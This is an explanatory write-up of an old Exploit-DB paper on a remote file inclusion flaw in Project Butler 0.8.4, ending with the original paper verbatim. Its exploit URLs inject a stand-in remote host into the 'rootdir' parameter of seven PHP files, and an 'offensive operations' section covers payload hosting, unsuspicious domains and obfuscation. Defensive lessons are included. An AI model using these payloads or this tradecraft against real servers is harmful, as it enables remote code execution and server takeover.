Project Butler 0.8.4 'rootdir' Remote File Inclusion Explained

What this paper is

This paper details a Remote File Inclusion (RFI) vulnerability found in Project Butler version 0.8.4. RFI vulnerabilities allow an attacker to trick a web application into including and executing code from a remote server. In this case, the rootdir parameter is the vector for this attack.

Simple technical breakdown

Project Butler is a web application. Like many web applications, it uses PHP. PHP has a feature that allows it to include code from other files. This is usually for organizing code, but if not handled carefully, it can be exploited.

The vulnerability lies in how Project Butler handles the rootdir parameter. This parameter is intended to specify a directory for caching or configuration files. However, the application doesn't properly validate if the provided rootdir is a local path or a remote URL.

An attacker can provide a URL to a malicious script hosted on their own server as the rootdir value. When Project Butler tries to include a file using this rootdir, it ends up fetching and executing the attacker's script instead of a local file.

Complete code and payload walkthrough

The provided exploit paper does not contain any executable code or shellcode. It only provides example URLs demonstrating how to trigger the vulnerability. The "exploit" section lists specific PHP files within the Project Butler application that are susceptible to this RFI.

The core of the exploit is the manipulation of the rootdir parameter. Let's break down the example URLs:

• http://[Target]/[Path]/classes/Cache.class.php?rootdir=http://cmd.gif?
• http://[Target]/[Path]/classes/Customer.class.php?rootdir=http://cmd.gif?
• ... and so on for other .php files.

Explanation of the URL structure:

• http://[Target]/[Path]/: This represents the base URL of the vulnerable Project Butler installation. [Target] is the IP address or hostname, and [Path] is the directory where Project Butler is deployed.
• classes/Cache.class.php (and other .php files): These are specific PHP files within the Project Butler application that are vulnerable. The attacker chooses one of these files to initiate the request.
• ?rootdir=: This is the query string parameter that is being manipulated.
• http://cmd.gif?: This is the attacker-controlled remote URL. The attacker would host a malicious script (e.g., a PHP web shell) at this URL. The .gif extension is likely a deceptive choice, as PHP can often interpret code even with non-standard extensions if the web server is configured to do so, or if the attacker controls the server and can force execution. The trailing ? might be used to ensure that the URL is treated as a complete URL by the include function, or to prevent unexpected parsing of subsequent characters.

Mapping list:

• rootdir parameter -> Practical Purpose: This parameter is intended to point to a directory for local file operations. Exploitation Purpose: It is used to inject a remote URL, causing the web server to fetch and execute code from an attacker-controlled server.
• http://cmd.gif? -> Practical Purpose: This is a placeholder for an attacker's remote server and script. Exploitation Purpose: This is the malicious payload that will be executed on the target server.

Unknowns:

• The exact content of the http://cmd.gif? payload is not specified in the paper. It is assumed to be a malicious script, likely a PHP web shell, designed to provide the attacker with command execution capabilities on the target server.
• The specific PHP functions within Cache.class.php, Customer.class.php, etc., that use the rootdir parameter are not detailed. However, it's highly probable they use functions like include, require, include_once, or require_once without proper sanitization of the rootdir variable.

Practical details for offensive operations teams

• Required Access Level: Typically, an attacker needs to be able to send HTTP requests to the target web application. No prior authentication or elevated privileges on the target server are usually required for this type of RFI.
• Lab Preconditions:
  • A vulnerable Project Butler 0.8.4 installation.
  • A controlled remote server (e.g., a VPS, a cloud instance) to host the malicious payload.
  • A web server configured on the remote server to serve the malicious payload.
  • The malicious payload itself (e.g., a PHP web shell).
• Tooling Assumptions:
  • A web browser or an HTTP request tool (like curl, Burp Suite, OWASP ZAP) to craft and send the exploit requests.
  • A simple web server (like Python's http.server, Nginx, Apache) on the attacker's machine to host the payload.
• Execution Pitfalls:
  • Firewall/WAF Blocking: The target server's firewall or Web Application Firewall (WAF) might block outbound connections to the attacker's server, preventing the include function from fetching the payload.
  • PHP Configuration (allow_url_include): The target server's PHP configuration might have allow_url_include set to Off, which disables the ability to include remote files. This is a critical prerequisite for the exploit to work.
  • URL Encoding/Sanitization: Some web applications might perform basic URL encoding or sanitization that could interfere with the exploit if not handled carefully.
  • Payload Extension: If the target server is configured to only execute PHP files with a .php extension, using a .gif extension for the payload might fail. The attacker might need to use a .php extension or find a way to force execution.
  • Path Traversal within RFI: While not directly shown, sometimes RFI can be combined with path traversal techniques if the rootdir is used in conjunction with other file operations.
• Tradecraft Considerations:
  • Reconnaissance: Identifying the exact version of Project Butler and its deployment path is crucial.
  • Payload Hosting: Ensure the payload server is stable and accessible from the target. Consider using a domain name that doesn't immediately raise suspicion.
  • Obfuscation: If the payload is detected, obfuscation techniques might be necessary.
  • Stealth: RFI can be noisy. The inclusion of a remote file will likely be logged on both the target and the attacker's server.

Where this was used and when

• Context: This vulnerability was discovered and published in 2006. Project Butler was a web-based project management application.
• Usage: Exploits of this nature were common in the mid-2000s against web applications that failed to properly validate user-supplied input for file inclusion functions. Attackers would use RFI to gain initial access, often to deface websites, steal data, or use the compromised server for further attacks.
• Approximate Years/Dates: Published August 14, 2006. Exploitation would have occurred around this time and potentially for a period afterward until the vulnerability was patched or the application was updated.

Defensive lessons for modern teams

• Input Validation is Paramount: Never trust user-supplied input, especially when it's used in file operations or system commands. Always validate and sanitize input rigorously.
• Disable allow_url_include: For security reasons, the allow_url_include directive in php.ini should almost always be set to Off in production environments. If remote file inclusion is a legitimate requirement for a specific feature, it must be implemented with extreme caution and strict controls.
• Use Whitelisting: Instead of trying to blacklist potentially malicious inputs, use whitelisting to allow only known good values. For file paths, this means explicitly defining allowed directories and filenames.
• Secure Coding Practices: Developers should be trained on secure coding practices, including the dangers of insecure file inclusion and how to prevent them.
• Regular Patching and Updates: Keep all web applications and their dependencies updated to the latest secure versions.
• Web Application Firewalls (WAFs): Deploy and properly configure WAFs to detect and block common web attack patterns, including RFI attempts.
• Least Privilege: Ensure web applications run with the minimum necessary privileges to limit the impact of a compromise.

ASCII visual (if applicable)

This exploit is a direct request-response interaction without complex architectural components. An ASCII visual isn't strictly necessary for understanding the core mechanism, but here's a simplified representation of the flow:

+-----------------+       +-----------------------+       +-------------------+
| Attacker's      | ----> | Target Web Server     | ----> | Attacker's Remote |
| Machine         |       | (Project Butler)      |       | Server            |
| (Crafts Request)|       |                       |       | (Hosts Payload)   |
+-----------------+       +-----------------------+       +-------------------+
       |                       |
       | 1. Sends HTTP GET     |
       |    request with       |
       |    rootdir=URL        |
       |                       |
       |                       | 2. Receives request for
       |                       |    remote file.
       |                       |
       |                       | 3. Includes remote file.
       |                       |    (If allow_url_include=On)
       |                       |
       |                       | 4. Fetches and executes
       |                       |    payload from Attacker's
       |                       |    Remote Server.
       |                       |
       |                       | 5. Returns result of
       |                       |    executed payload.
       |                       |
       +-----------------------+

Source references

• Paper ID: 2183
• Paper Title: ProjectButler 0.8.4 - 'rootdir' Remote File Inclusion
• Author: the master
• Published: 2006-08-14
• Keywords: PHP, webapps
• Paper URL: https://www.exploit-db.com/papers/2183
• Raw URL: https://www.exploit-db.com/raw/2183

Original Exploit-DB Content (Verbatim)

########################################################################
#  projectbutler-0.8.4  Remote File Inclusion Vulnerability
#
#  Download: http://prdownloads.sourceforge.net/projectbutler/projectbutler-0.8.4.tar.gz?download
#
#  Found By: the master
#
########################################################################
#  exploit:
#
#  http://[Target]/[Path]/classes/Cache.class.php?rootdir=http://cmd.gif?
#  http://[Target]/[Path]/classes/Customer.class.php?rootdir=http://cmd.gif?
#  http://[Target]/[Path]/classes/Performance.class.php?rootdir=http://cmd.gif?
#  http://[Target]/[Path]/classes/Project.class.php?rootdir=http://cmd.gif?
#  http://[Target]/[Path]/classes/Representative.class.php?rootdir=http://cmd.gif?
#  http://[Target]/[Path]/classes/User.class.php?rootdir=http://cmd.gif?
#  http://[Target]/[Path]/classes/common.php?rootdir=http://cmd.gif?
########################################################################

# milw0rm.com [2006-08-14]